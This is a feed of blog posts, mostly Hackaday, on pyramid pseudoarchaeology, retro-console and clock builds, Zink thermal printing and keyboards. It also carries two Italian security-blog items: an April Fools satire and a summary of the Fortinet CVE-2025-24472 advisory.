The idea of ‘lost technology’ is a pervasive one, mostly buoyed by the axiom that you cannot disprove something, only find evidence for its absence. Much like the possibility of a teapot being in orbit around the Sun right now, you cannot disprove that the Ancient Egyptians did not have hyper-advanced power plants using zero point energy back around 3,600 BCE. This ties in with the idea of ‘lost civilizations‘, which really caught on around the Victorian era.

Such romanticism for a non-existent past led to the idea of Atlantis being a real, lost civilization becoming pervasive, with the 1960s seeing significant hype around the Bimini Road. This undersea rock formation in the Bahamas was said to have been part of Atlantis, but is actually a perfectly cromulent geological formation. More recently a couple of German tourists got into legal trouble while trying to prove a connection between Egypt’s pyramids to Atlantis, which is a theory that refuses to die along with the notion that Atlantis was some kind of hyper-advanced civilization and not just a fictional society that Plato concocted to illustrate the folly of man.

Admittedly there is a lot of poetry in all of this when you consider it from that angle.
Welcome to Shangri-La… or rather Shambhala as portrayed in Uncharted 3.
People have spent decades of their life and countless sums of money on trying to find Atlantis, Shangri-La (possibly inspired by Shambhala), El Dorado and similar fictional locations. The Iram of the Pillars which featured in Uncharted 3: Drake’s Deception is one of the lost cities mentioned in the Qur’an, and is incidentally another great civilization that saw itself meet a grim end through divine punishment. Iram is often said to be Ubar, which is commonly known as Atlantis of the Sands.

All of this is reminiscent of the Giant’s Causeway in Northern Ireland, and corresponding area at Fingal’s Cave on the Scottish isle of Staffa, where eons ago molten basalt cooled and contracted into basalt columns in a way that is similar to how drying mud will crack in semi-regular patterns. This particular natural formation did lead to many local myths, including how a giant built a causeway across the North Channel, hence the name.

Fortunately for this location, no ‘lost civilization’ tag became attached, and thus it remains a curious demonstration of how purely natural formations can create structures that one might assume to have required intelligence, thus providing fuel for conspiracies. So far only ‘Young Earth’ conspiracy folk have put a claim on this particular site.

What we can conclude is that much like the Victorian age that spawned countless works of fiction on the topic, many of these modern-day stories appear to be rooted in a kind of romanticism for a past that never existed, with those affected interpreting natural patterns as something more in a sure sign of confirmation bias.

Tourist Traps

Tomb of the First Emperor Qin Shi Huang Di, Xi’an, China (Credit: Aaron Zhu)
One can roughly map the number of tourist visits with the likelihood of wild theories being dreamed up. These include the Egyptian pyramids, but also similar structures in what used to be the sites of the Aztec and Maya civilizations. Similarly the absolutely massive mausoleum of Qin Shi Huang in China with its world-famous Terracotta Army has led to incredible speculation on what might still be hidden inside the unexcavated tomb mound, such as entire seas and rivers of mercury that moved mechanically to simulate real bodies of water, a simulated starry sky, crossbows set to take out trespassers and incredible riches.

Many of these features were described by Sima Qian in the first century BCE, who may or may not have been truthful in his biography of Qin Shi Huang. Meanwhile, China’s authorities have wisely put further excavations on hold, as they have found that many of the recovered artefacts degrade very quickly once exposed to air. The paint on the terracotta figures began to flake off rapidly after excavation, for example, reducing them to the plain figures which we are familiar with.

Tourism can be as damaging as careless excavation. As popular as the pyramids at Giza are, centuries of tourism have taken their toll, with vandalism, graffiti and theft increasing rapidly since the 20th century. The Great Pyramid of Khufu had already been pilfered for building materials over the course of millennia by the local population, but due to tourism part of its remaining top stones were unceremoniously tipped over the side to make a larger platform where tourists could have some tea while gazing out over the the Giza Plateau, as detailed in a recent video on the History for Granite channel:

youtube.com/embed/1Cs1k_j49MQ?…

The recycling of building materials from antique structures was also the cause of the demise of the Labyrinth at the foot of the pyramid of Amenemhat III at Hawara. Once an architectural marvel, with reportedly twelve roofed courts and spanning a total of 28,000 m², today only fragments remain of its existence. This sadly is how most marvels of the Ancient World end up: looted ruins, ashes and shards, left in the sand, mud, or reclaimed by nature, from which we can piece together with a lot of patience and the occasional stroke of fortune a picture what it once may have looked like.

Pyramid Power

Cover of The Giza Power Plant book. (Credit: Christopher Dunn)
When in light of all this we look at the claims made about the Pyramid of Khafre and the persistent conspiracies regarding this and other pyramids hiding great secrets, we can begin to see something of a pattern. Some people have really bought into these fantasies, while for others it’s just another way to embellish a location, to attract more rubes tourists and sell more copies of their latest book on the extraterrestrial nature of pyramids and how they are actually amazing lost technologies. This latter category is called pseudoarcheology.

Pyramids, of course, have always held magical powers, but the idea that they are literal power plants seems to have been coined by one Christopher Dunn, with the publication of his pseudo-archeological book The Giza Power Plant in 1998. That there would be more structures underneath the Pyramid of Khafre is a more recent invention, however. Feeding this particular flight of fancy appears to be a 2022 paper by Filippo Biondi and Corrado Malanga, in which synthetic aperture radar (SAR) was used to examine said pyramid interior and subsurface features.

Somehow this got turned into claims about multiple deep vertical wells descending 648 meters along with other structures. Shared mostly via conspiracy channels, it widely extrapolates from claims made in the paper by Biondi et al., with said SAR-based claims never having been peer-reviewed or independently corroborated. On the Rational Wiki entry for these and other claims related to the Giza pyramids are savagely tossed under the category of ‘pyramidiots’.
The art that conspiracy nuts produce when provided with generative AI tools. (Source: Twitter)
Back in the real world, archaeologists have found a curious L-shaped area underneath a royal graveyard near Khufu’s pyramid that was apparently later filled in, but which seems to lead to a deeper structure. This is likely to be part of the graveyard, but may also have been a feature that was abandoned during construction. Currently this area is being excavated, so we’re likely to figure out more details after archaeologists have finished gently sifting through tons of sand and gravel.

There is also the ScanPyramids project, which uses non-destructive and non-invasive techniques to scan Old Kingdom-era pyramids, such as muon tomography and infrared thermography. This way the internal structure of these pyramids can be examined in-depth. One finding was that of a number of ‘voids’, which could mean any of a number of things, but most likely do not contain world-changing secrets.

To this day the most credible view is still that the pyramids of the Old Kingdom were used as tombs, though unlike the mastabas and similar tombs, there is a credible argument to be made that rather than being designed to be hidden away, these pyramids would be eternal monuments to the pharaoh. They would be open for worship of the pharaoh, hence the ease of getting inside them. Ironically this would make them more secure from graverobbers, which was a great idea until the demise of the Ancient Egyptian civilization.

This is a point that’s made succinctly on the History for Granite channel, with the conclusion being that this goal of ‘inspiring awe’ to worshippers is still effective today, simply judging by the millions of tourists each year to these monuments, and the tall tales that they’ve inspired.

hackaday.com/2025/04/01/on-egy…

Microsoft made gaming history when it developed Achievements and released them with the launch of the Xbox 360. They have since become a key component of gaming culture, which similar systems rolling out to the rest of the consoles and even many PC games. [odelot] has the honor of being the one to bring this functionality to an odd home—the original Nintendo Entertainment System!

It’s actually quite functional, and it’s not as far-fetched as it sounds. What [odelot] created is the NES RetroAchievements (RA) Adapter. It contains a Raspberry Pi Pico which sits in between a cartridge and the console and communicates with the NES itself. The cartridge also contains an LCD screen, a buzzer, and an ESP32 which communicates with the Internet.

When a cartridge is loaded, the RA Adapter identifies the game and queries the RetroAchievements platform for relevant achievements for the title. It then monitors the console’s memory to determine if any of those achievements—such as score, progression, etc.—are met. If and when that happens, the TFT screen on the adapter displays the achievement, and a notification is sent to the RetroAchievements platform to record the event for posterity.

It reminds us of other great feats, like the MJPEG entry into the heart of the Sega Saturn.

youtube.com/embed/u1GWOFgOU88?…

hackaday.com/2025/04/01/bringi…

After seeing some of the interesting clock builds we’ve featured recently, [shiura] decided to throw their hat in the ring and sent us word about their incredible 3D printed hybrid clock that combines analog and digital styles.

While the multiple rotating rings might look complex from the front, the ingenious design behind the mechanism is powered by a single stepper motor. Its operation is well explained in the video below, but the short version is that each ring has a hook that pushes its neighboring ring over to the next digit once it has completed a full rotation. So the rightmost ring rotates freely through 0 to 9, then flips the 10-minute ring to the next number before starting its journey again. This does mean that the minute hand on the analog display makes a leap forward every 10 minutes rather than move smoothly, but we think its a reasonable compromise.

Beyond the 28BYJ-48 geared stepper motor and its driver board, the only other electronics in the build is a Seeed Studio XIAO ESP32C6 microcontroller. The WiFi-enabled MCU is able to pull the current time down from the Internet, but keep it mind it takes quite awhile for the mechanism to move all the wheels; you can see the process happen at 60x speed in the video.

If you’re looking to recreate this beauty, the trickiest part of this whole build might be the 3D print itself, as the design appears to make considerable use of multi-material printing. While it’s not impossible to build the clock with a traditional printer, you’ll have to accept losing some surface detail on the face and performing some well-timed filament swaps.

[shirua] tells us they were inspired to send their timepiece in after seeing the post about the sliding clock that just went out earlier in the week.

youtube.com/embed/1tuMgLnDYpg?…

hackaday.com/2025/04/01/hybrid…

Benvenuti nell’era della responsabilità individuale!

O almeno, così dovrebbe essere. Perché se nel mondo fisico possiamo ancora illuderci che lo Stato sia un’entità benevola pronta a proteggerci dai nostri stessi errori, nel cyberspazio vige una sola legge: sopravvive chi è capace.

Chi non lo è? Peggio per lui.

Minori sui Social: I Figli Sono Tuoi, Educateli

Basta con il piagnisteo collettivo sulla tutela dei minori online.

Se un ragazzino finisce in balia di contenuti inappropriati o predatori digitali, la colpa è una e una sola: dei genitori. Nessuno vi obbliga a mettere in mano a un dodicenne un iPhone con TikTok installato e nessuno vi deve nulla se decidete di delegare a Mark Zuckerberg l’educazione dei vostri figli.

La rete è un campo minato?

Certo, come il mondo reale. Solo che qui non c’è un marciapiede sicuro: o si insegna ai propri figli a muoversi con intelligenza o si accetta il rischio.

Truffe Online: Non Sai Difenderti?

Ogni giorno migliaia di persone cascano nelle solite truffe: email di principi nigeriani, call center che promettono investimenti miracolosi, influencer che vendono corsi sul “diventare ricchi”.

E chi si lamenta invocando regolamentazioni più stringenti? Il problema non sono i truffatori, il problema sono i creduloni.

Se non sei in grado di navigare senza farti spennare, non devi chiedere allo Stato di proteggerti: devi proteggerti da solo. Non sai come? Esistono assicurazioni contro le frodi. (segui il link a fondo pagina e ricordati di usare il codice SCAM per il 50% di sconto sul primo anno).

E indovina un po’? Le devi pagare. Vuoi sicurezza gratis? Sei nel posto sbagliato.

Privacy: Sei il Prodotto, Non il Cliente

Se usi un servizio gratuito, non esiste il “diritto alla privacy”: il prodotto sei tu.

I tuoi dati valgono denaro e nessuna azienda ha mai preteso il contrario.

Non ti piace? Disconnettiti!

Non vuoi che i tuoi dati finiscano nelle mani di terzi? Non metterli online.

L’illusione di un mondo in cui puoi postare la tua intera vita sui social e poi pretendere che tutto sparisca a comando è, appunto, un’illusione.

Vuoi anonimato totale? Impara a criptare le tue comunicazioni, paga per servizi che garantiscono riservatezza e, soprattutto, smetti di stare sui social.

Data Breach: Colpa delle Aziende?

Quando una banca subisce una rapina fisica, diamo la colpa alla banca? No.

Quando una persona viene aggredita, la colpa è della vittima? No.

E allora perché quando un’azienda subisce un data breach, tutti si affrettano a invocare multe e sanzioni?

Gli hacker sono il male, le aziende ne sono vittime.

Dire che un’azienda sia colpevole di un attacco informatico è un po’ come dare la colpa a una vittima per aver subito un furto. Sì, è un’affermazione forte, ma riflettiamoci: davvero possiamo attribuire tutta la responsabilità a chi subisce l’attacco?

AI Generativa, Proprietà Intellettuale, Copyright: Smettetela di Piangere

Cari artisti digitali, mettetevi il cuore in pace: tutta l’arte umana è un derivato di qualcos’altro.

L’AI non vi sta copiando, ha imparato da voi e ora genera qualcosa di nuovo. Così come voi avete attinto dagli artisti che vi hanno preceduto, così l’AI ha imparato dagli stessi artisti, e purtroppo, anche da voi.

Solo che lo fa con un ritmo un tantino più veloce di tutti noi messi assieme.

Se una AI vi supera in estro, creatività e produttività, forse è semplicemente meglio di voi? Dovete smettere di lamentarvi, iniziare ad usarla.

Prima Conclusione: Il Mondo Digitale Non Ha Regole

Vivi in un’era dove la libertà è totale, ma la responsabilità è altrettanto totale.

Sei solo nel cyberspazio e devi imparare a proteggerti. Chiedere allo Stato di regolamentare la rete è come chiedere di mettere dei guardrail sugli oceani. L’unica difesa che hai sei tu stesso.

E se questo non ti piace: disconnettiti.

Sei arrivato alla fine di questo articolo? Bravissimo.

Ti sei arrabbiato? Non sei contento? Ti senti offeso?

BENISSIMO. Mi hai dato engagement. Magari lo hai commentato, riposato sui social, e a me interessa solo questo: i tuoi click per i miei sponsor. Sei solo un consumatore passivo, i tuoi sentimenti sono monetizzabili, sia positivi che negativi. Per giunta, l’intero articolo è stato scritto semplicemente copiando una chat tra due idioti che le sparano grosse in un LLM. Minima spesa, massima resa.

Seconda Conclusione

Abbiamo utilizzato parole forti, è vero, ma purtroppo questo è internet, nel bene e nel male ed è oggi anche il Primo di Aprile!

Internet è’ un luogo dove l’informazione si mescola alla disinformazione, dove l’indignazione vale più della verità, e dove ogni tua reazione genera profitto per qualcun altro.

Sei libero di scegliere cosa credere, ma sappi che, alla fine, sei solo un numero in un algoritmo, un dato da sfruttare.

E ora? Condividerai questo articolo indignato o farai finta di niente?

In entrambi i casi, il genio è ora uscito dalla lampada e non puoi farci più nulla nel rimettercelo dentro.

L'articolo Italia HACKED BY F-Norm Society! Ecco l’Anarchia Digitale: Sei solo e ti sta bene così proviene da il blog della sicurezza informatica.

A great many PlayStation 2 games were coded in C++, and there are homebrew SDKs that let you work in C. However, precious little software for the platform was ever created in Golang. [Ricardo] decided this wouldn’t do, and set about making the language work with Sony’s best-selling console of all time.

Why program a PS2 in Go? Well, it can be easier to work with than some other languages, but also, there’s just value in experimenting in this regard. These days, Go is mostly just used on traditional computery platforms, but [Ricardo] is taking it into new lands with this project.

One of the challenges in getting Go to run on the PS2 is that the language was really built to live under a full operating system, which the PS2 doesn’t really have. However, [Ricardo] got around this by using TinyGo, which is designed for compiling Go on simpler embedded platforms. It basically takes Go code, turns it into an intermediate representation, then compiles binary code suitable for the PS2’s Emotion Engine (which is a MIPS-based CPU).

The specifics of getting it all to work are quite interesting if you fancy challenges like these. [Ricardo] was even able to get to an effective Hello World point and beyond. There’s still lots to do, and no real graphical fun yet, but the project has already passed several key milestones. It recalls us of when we saw Java running on the N64. Meanwhile, if you’re working to get LOLCODE running on the 3DO, don’t hesitate to let us know!

hackaday.com/2025/03/31/golang…

A spectrometer is one of those tools that many of us would love to have, but just can’t justify the price of. Sure there are some DIY options out there, but few of them have the convenience or capability of what’s on the commercial market. [Chris] from Zoid Technology recently found a portable spectrometer complete with Android application for just $150 USD on AliExpress which looked very promising…at least at first.

The problem is that the manufacturer, Torch Bearer, offers more expensive models of this spectrometer. In an effort to push users into those higher-priced models, arbitrary features such as data export are blocked in the software. [Chris] first thought he could get around this by reverse engineering the serial data coming from the device (interestingly, the spectrometer ships with a USB-to-serial adapter), but while he got some promising early results, he found that the actual spectrometer data was obfuscated — a graph of the results looked like stacks of LEGOs.

That ain’t right — data over the serial link was obfuscated for your protection fleecing
His next step was to decompile the Android application and manually edit out the model number checks. This let him enable the blocked features, although to be fair, he did find that some of them actually did require additional hardware capabilities that this cheaper model apparently doesn’t posses. He was able to fix up a few other wonky issues in the application that are described in the video below, and has released a patch that you can use to bring your own copy of the software up to snuff.

But that’s not all — while fiddling around inside the Android tool’s source code, he found the missing pieces he needed to understand how the serial data was being obfuscated. The explanation to how it works is pretty long-winded, so we’ll save time and just say that the end result was the creation of a Python library that lets you pull data from the spectrometer without relying on any of the manufacturer’s software. This is the kind of thing a lot of people have been waiting for, so we’re eager to see what kind of response the GPLv3 licensed tool gets from the community.

If you’d still rather piece together your own spectrometer, we’ve seen some pretty solid examples you can use to get started.

youtube.com/embed/UXphrby4AVw?…

hackaday.com/2025/03/31/softwa…

[Luca Dentella] recently encountered a toy, which was programmed to read different stories aloud based on the figurine placed on top. It inspired him to build an audio device using the same concept, only with music instead of children’s stories.

The NFC Music Player very much does what it says on the tin. Present it with an NFC card, and it will play the relevant music in turn. An ESP32 WROOM-32E lives at the heart of the build, which is hooked up over I2S with a MAX98357A Class D amplifier for audio output. There’s also an SD card slot for storing all the necessary MP3s, and a PN532 NFC reader for reading the flash cards that activate the various songs. Everything is laced up inside a simple 3D-printed enclosure with a 3-watt full range speaker pumping out the tunes.

It’s an easy build, and a fun one at that—there’s something satisfying about tossing a flash card at a box to trigger a song. Files are on Github for the curious. We’ve featured similar projects before, like the Yaydio—a fun NFC music player for kids. Video after the break.

youtube.com/embed/ck0IdwVWIIs?…

hackaday.com/2025/03/31/a-musi…

[Jamie] decided to build a generator, and Lego is his medium of choice. Thus was created a fancy levitating generator that turns a stream of air into electricity.

The basic concept is simple enough for a generator—magnets moving past coils to generate electricity. Of course, Lego doesn’t offer high-strength magnetic components or copper coils, so this generator is a hybrid build which includes a lot of [Jamie’s] non-Lego parts. Ultimately though, this is fun because of the weird way it’s built. Lego Technic parts make a very crude turbine, but it does the job. The levitation is a particularly nice touch—the build uses magnets to hover the rotor in mid-air to minimize friction to the point where it can free wheel for minutes once run up to speed. The source of power for this contraption is interesting, too. [Jamie] didn’t just go with an air compressor or a simple homebrew soda bottle tank. Instead, he decided to use a couple of gas duster cans to do the job. The demos are pretty fun, with [Jamie] using lots of LEDs and a radio to demonstrate the output. The one thing we’d like to see more of is proper current/voltage instrumentation—and some measurement of the RPM of this thing!

While few of us will be rushing out to build Lego generators, the video nonetheless has educational value from a mechanical engineering standpoint. Fluids and gases really do make wonderful bearings, as we’ve discussed before. Video after the break.

youtube.com/embed/cnkhsk74tm0?…

hackaday.com/2025/03/31/levita…

Hackers like making clocks, and we like reporting on them around these parts. Particularly if they’ve got a creative mechanism that we haven’t seen before. This fine timepiece from [gooikerjh] fits the bill precisely—it’s a sliding tile clock!

The brains of the build is an Arduino Nano ESP32. No, that’s not a typo. It’s basically an ESP32 in a Nano-like form factor. It relies on its in-built WiFi hardware to connect to the internet and synchronize itself with time servers so that it’s always showing accurate time. The ESP32 is set up to control a set of four stepper motors with a ULN2003 IC, and they run the neat time display mechanism.

All the custom parts are 3D printed, and the sliding tile concept is simple enough. There are four digits that show the time. Each digit contains number tiles that slide into place as the digit rotates. To increment the digit by one, it simply needs to be rotated 180 degrees by the relevant stepper motor, and the next number tile will slide into place.

We love a good clock at Hackaday—the more mechanical, the better. If you’re cooking up your own nifty and enigmatic clocks at home, don’t hesitate to drop us a line!

hackaday.com/2025/03/31/buildi…

When you think of printing on paper, you probably think of an ink jet or a laser printer. If you happen to think of a thermal printer, we bet you think of something like a receipt printer: fast and monochrome. But in the last few decades, there’s been a family of niche printers designed to print snapshots in color using thermal technology. Some of them are built into cameras and some are about the size of a chunky cell phone battery, but they all rely on a Polaroid-developed technology for doing high-definition color printing known as Zink — a portmanteau of zero ink.

For whatever reason, these printers aren’t a household name even though they’ve been around for a while. Yet, someone must be using them. You can buy printers and paper quite readily and relatively inexpensively. Recently, I saw an HP-branded Zink printer in action, and I wasn’t expecting much. But I was stunned at the picture quality. Sure, it can’t print a very large photo, but for little wallet-size snaps, it did a great job.

The Tech

Polaroid was well known for making photographic paper with color layers used in instant photography. In the 1990s, the company was looking for something new. The Zink paper was the result. The paper has three layers of amorphochromic dyes. Initially, the dye is colorless, but will take on a particular color based on temperature.

The key to understanding the process is that you can control the temperature that will trigger a color change. The top layer of the paper requires high heat to change. The printer uses a very short pulse, so that the top layer will turn yellow, but the heat won’t travel down past that top layer.

The middle layer — magenta — will change at a medium heat level. But to get that heat to the layer, the pulse has to be longer. The top layer, however, doesn’t care because it never gets to the temperature that will cause it to turn yellow.

The bottom layer is cyan. This dye is set to take the lowest temperature of all, but since the bottom heats up slowly, it takes an even longer pulse at the lower temperature. The top two layers, again, don’t matter since they won’t get hot enough to change. A researcher involved in the project likened the process to fried ice cream. You fry the coating at a high temperature for a short time to avoid melting the ice cream. Or you can wait, and the ice cream will melt without affecting the coating.

The pulses range from about 500 microseconds for yellow up to 10 milliseconds for cyan. The dyes need to not erroneously react to, say, sunlight, so the temperature targets ranged from 100 °C to 200 °C. A solvent melts at the right temperature and causes the dye to change color. So, technically, the dye doesn’t change color with heating. The solvent causes it to change color, and the heat releases the solvent.

It works well, as you can see in the short clip below. There’s no audio, but the printer does make a little grinding noise as it prints:

youtube.com/embed/mxcW8Ul9bZM?…

The History

Zink started as research from Polaroid. The company’s instant film used color dyes that diffuse up to the surface unless blocked by a photosensitive chemical. The problem is that diffusion is difficult to control, so they were interested in finding another alternative.

Chemists at Polaroid had the idea of using a colorless chemical until exposed to light. They would eventually give up in the 1980s, but revisited the idea in the 1990s when digital photography started eroding their market share.

One program designed to save the company was to build a portable printer, and the earlier research on colorless dyes came back around. Thermal print heads were already available. You only needed a paper showing different colors based on some property the print head could control.

The team had success in the early 2000s. A 2″ x 3″ print required 200 million pulses of heat, but the results were impressive, although not quite as good as they needed to be for a commercial device. Unfortunately, in 2001, Polaroid filed for bankruptcy. The company changed hands a few times until the new owner decided it was too expensive to continue researching the new printer technology.

A New Hope

The people driving the project knew they had to find a buyer for the technology if they wanted to continue. Many companies were interested in a finished product, but not as interested in a prototype.

They were using a modified but existing thermal printer from Alps to demonstrate the technology, and when they showed it to Alps, they immediately signed on as a partner to make the hardware. This was enough to persuade an investor to step up and pull the company out of what was left of Polaroid.

Calibration

Of course, there were trials, but the new company, Zink Imaging, managed to roll out a commercially viable product. One problem solved was dealing with the slightly different paper between batches. The answer was to have each pack of paper have a barcode on the first sheet that the printer uses to calibrate itself.

Zink’s business model involves selling the paper it makes. It licenses its technology to companies like Polaroid, Dell, Kodak, and HP, which then have the usual manufacturing partners build the printers. Search your favorite retailer for “zink printer” and you’ll find plenty of options. The 2″ x 3″ paper is still popular, although you can get 4″ x 6″ printers, too.

Of course, saying it is inkless isn’t really true. The “ink” is in the paper and, as you might expect, the paper isn’t that cheap. On the other hand, inkjet ink is also expensive, and you don’t have to worry about a printer clogging up if it is unused for a few months.

More…

One of many internal photos in the FCC filing
While Skymall no longer sells from airplanes, their YouTube channel shows a high-level view of how the printer works in a video, which you can see below.

If you were hoping for a teardown, check out the FCC filings to find plenty of internal pictures (we’ve mentioned how to do this before).

We are always surprised these aren’t more common. Do you have one of these printers? Let us know in the comments. The best use we’ve seen of one of these was in a fake Polaroid camera. If you really want nostalgic photography, break out your 3D printer.

youtube.com/embed/iQYVQlhMbKo?…

hackaday.com/2025/03/31/zink-i…

Let’s say you had a SNES with a busted CPU. What would you do? Your SNES would be through! That is, unless, you had a replacement based on an FPGA. [leonllr] has been developing just such a thing.

The project was spawned out of necessity. [leonllr] had purchased a SNES which was struck down with a dead CPU—in particular, a defective S-CPU revision A. A search for replacements only found expensive examples, and ones that were most likely stripped from working machines. A better solution was necessary.

Hence, a project to build a replacement version of the chip using the ICE40HX8K FPGA. Available for less than $20 USD, it’s affordable, available, and has enough logic cells to do the job. It’s not just a theoretical or paper build, either. [leonllr] has developed a practical installation method to hook the ICE40HX8K up to real hardware, which uses two flex PCBs to go from the FPGA mainboard to the SNES motherboard itself. As for the IP on the FPGA, the core of the CPU itself sprung from the SNESTANG project, which previously recreated the Super Nintendo on Sipeed Tang FPGA boards. As it stands, boards are routed, and production is the next step.

It’s nice to see classic hardware resurrected by any means necessary. Even if you can’t get a whole bare metal SNES, you might be able to use half of one with a little help from an FPGA. We’ve seen similar work on other platforms, too. Meanwhile, if you’re working to recreate Nintendo 64 graphics chips in your own basement, or something equally weird, don’t hesitate to let us know!

hackaday.com/2025/03/31/a-snes…

Are you eager to get your feet wet in the keyboard surf, but not quite ready to stand up and ride the waves of designing a full-size board? You should paddle out with a macro pad instead, and take on the foam face-first and lying down.

Image by [Robert Feranec] via Hackaday.IOLuckily, you have a great instructor in [Robert Feranec]. In a series of hour-long videos, [Robert] guides you step by step through each part of the process, from drawing the schematic, to designing a PCB and enclosure, to actually putting the thing together and entering a new world of macros and knobs and enhanced productivity.

Naturally, the fewer keys and things you want, the easier it will be to build. But [Robert] is using the versatile Raspberry Pi 2040, which has plenty of I/O pins if you want to expand on his basic plan. Not ready to watch the videos? You can see the schematic and the 3D files on GitHub.

As [Robert] says, this is a great opportunity to learn many skills at once, while ending up with something terrifically useful that could potentially live on your desk from then on. And who knows where that could lead?

Holy Leather Work, Batman!

[Notxtwhiledrive] had long wanted to design a keyboard from scratch, but could never think of a compelling concept from which to get going. Then one day while doing some leather work, it dawned on him to design a portable keyboard much the same way as he would a wallet.

Image by [Notxtwhiledrive] via redditThe result? A stunning keyboard wallet that can go anywhere and may outlast most of us. The Wallet42 is based on the FFKB layout by Fingerpunch. This hand-wired unibody split uses the Supermini nRF52840 microcontroller with ZMK firmware and rests inside 2 mm-thick chrome-tanned leather in chocolate and grey.

Switch-wise, it has Otemu low-profile reds wearing TPU keycaps. [Notxtwhiledrive] is thinking about making a hot swap version before open-sourcing everything and/or taking commissions. Even better, he apparently recorded video throughout the process and is planning to upload a video about designing and building this beautiful board.

The Centerfold: Levels, the Prototype

Image by [timbetimbe] via redditAt the risk of dating myself, this ’80s kid definitely appreciates the aesthetic of Levels, a new prototype by redditor [timbetimebe]. This is a centerfold because look at it, but also because there is like basically no detail at this time. But watch this space.

Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!

Historical Clackers: the Secor

When we last left Historical Clackers, we examined the Williams machine with its curious grasshopper-like type bars. If you’ll recall, the Williams Typewriter Company was acquired by Jerome Burgess Secor, a former superintendent of the Williams Typewriter Company.
Image via The Antikey Chop
Secor, an inventor in his own right, began working at Williams in 1899. By 1902, he was filing typewriter patents for frontstrike machines that looked nothing like the Williams grasshopper number. By the summer of 1910, Secor took over the failed company.

Though radically different, the Secor typewriters were not radically better than the Williams grasshopper. And though the typist could see more with the Secor, the only real hype surrounded the removable, interchangeable escapement.

The Secor Company produced about 7,000 machines between three models, one with a wide carriage. Between the impending war, competition, and alleged labor issues, the writing was on the wall for the Secor Company, and it folded in 1916.

But you shouldn’t feel sorry for Mr. Secor. His main wheelhouse was mechanical toy and sewing machine manufacture. He did well for himself in these realms, and those items are far more sought after by collectors than his typewriters, interestingly enough.

Finally, a Quick Guide to Cleaning That Awful Keyboard Of Yours

Oh, I’m pointing one finger back at myself, trust me. You should see this thing. I really should go at it with the compressor sometime soon. And I might even take all the steps outlined in this keyboard deep-cleaning guide by [Ben Smith].

[Ben] estimates that this exercise will take 30 minutes to an hour, but also talks about soaking the keycaps, so (in my experience) you can add several hours of drying time to that ballpark. Plan for that and have another keyboard to use.

Apparently he has two cats that sit directly on the keyboard at every opportunity. I’m not so lucky, so although there is definitely cat hair involved, it doesn’t blanket the switch plate or anything. But you should see [Ben]’s keyboard.

Click to judge [Ben] for his dirty keyboard. Then go de-cap yours, ya filthy animal. Image by [Ben Smith] via Pocket-lintSo basically, start by taking a picture of it so you can reassemble the keycaps later. He recommends looking up the key map online; I say just take a picture. You’re welcome. Then you should unplug the thing or power it down. Next up is removing the keycaps. This is where I would take it out to the garage and use the ol’ pancake compressor, or maybe just use the vacuum cleaner turned down low with the brushy attachment. But [Ben] uses canned air. Whatever you’ve got.

Everyone enjoys a nice shower now and then. Image by [Ben Smith] via Pocket-lintFor any hangers-on, bust out an old toothbrush and go to town on those browns. This is as good a time as any to put your keycaps in a bowl with some warm water and a bit of dish soap.

My suggestion — if they’re super gross, put them in something with a lid so you can shake the whole concoction around and knock the dirt off with force.

After about half an hour, use a colander to strain and drain them while rinsing them off. Then let them get good and dry, and put your board back together.

Enjoy the feeling of non-oily keycaps and the sound of full thock now that the blanket of cat hair has been lifted. Rejoice!

Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.

hackaday.com/2025/03/31/keebin…

La Cybersecurity and Infrastructure Security Agency (CISA) ha emesso un avviso di sicurezza critico riguardante una vulnerabilità di bypass dell’autenticazione nei sistemi FortiOS e FortiProxy di Fortinet. La vulnerabilità, identificata come CVE-2025-24472, è attualmente sfruttata attivamente in campagne ransomware, rendendola una minaccia significativa per le organizzazioni che utilizzano questi prodotti.

Pertanto è importante assicurarsi che i prodotti Fortinet siano correttamente aggiornati e in caso contrario procedere con l’applicazione delle patch.

La falla di sicurezza, che ha ottenuto un punteggio CVSS di 8,1, consente ad aggressori remoti di ottenere privilegi di super amministratore attraverso richieste proxy CSF contraffatte, senza richiedere l’interazione dell’utente. Secondo l’avviso pubblicato da Fortinet: “Una vulnerabilità di bypass dell’autenticazione mediante un percorso o canale alternativo che interessa FortiOS e FortiProxy potrebbe consentire a un aggressore remoto di ottenere privilegi di super amministratore tramite richieste proxy CSF contraffatte.”

Versioni Interessate e implicazioni del bug di sicurezza

Questa vulnerabilità riguarda le seguenti versioni dei prodotti Fortinet:

• FortiOS: dalla versione 7.0.0 alla 7.0.16
• FortiProxy: dalla versione 7.0.0 alla 7.0.19 e dalla 7.2.0 alla 7.2.12

Uno sfruttamento riuscito di questa vulnerabilità potrebbe fornire agli attaccanti pieno accesso amministrativo ai sistemi compromessi. Le potenziali conseguenze includono:

• Creazione di account amministrativi non autorizzati
• Modifica delle policy del firewall
• Accesso non autorizzato alle VPN SSL, consentendo agli aggressori di infiltrarsi nelle reti interne

Questo livello di compromissione rende la vulnerabilità particolarmente pericolosa, soprattutto nel contesto delle operazioni ransomware.

Mitigazioni e Patch Disponibili

La CISA ha invitato tutte le organizzazioni a implementare immediatamente le misure di mitigazione suggerite dal fornitore. Fortinet ha rilasciato le seguenti patch per correggere la vulnerabilità:

• FortiOS: aggiornato alla versione 7.0.17 o successive
• FortiProxy: aggiornato alle versioni 7.0.20 o 7.2.13 o successive

Per le organizzazioni che non possono applicare subito l’aggiornamento, Fortinet raccomanda di:

• Disabilitare l’interfaccia amministrativa HTTP/HTTPS
• Implementare restrizioni basate su IP tramite policy di ingresso locale
• Monitorare i registri per individuare attività sospette, come accessi amministrativi inspiegabili o la creazione di account amministrativi con nomi utente casuali

L’Importanza del Catalogo KEV di CISA

La vulnerabilità CVE-2025-24472 è stata inserita nel catalogo KEV (Known Exploited Vulnerabilities) del CISA, una lista di vulnerabilità confermate come sfruttate attivamente. Il CISA raccomanda a tutte le organizzazioni di dare priorità alla correzione delle vulnerabilità presenti nel catalogo KEV per ridurre il rischio di compromissioni.

L’utilizzo del catalogo KEV come riferimento nella gestione delle vulnerabilità aiuta a identificare e risolvere tempestivamente le falle di sicurezza più critiche, proteggendo le infrastrutture IT da attacchi mirati.

L'articolo CISA: Fortinet FortiOS e FortiProxy sfruttati attivamente. Il Bug di Authentication Bypass finisce nel KEV proviene da il blog della sicurezza informatica.

SUPPORTED BY

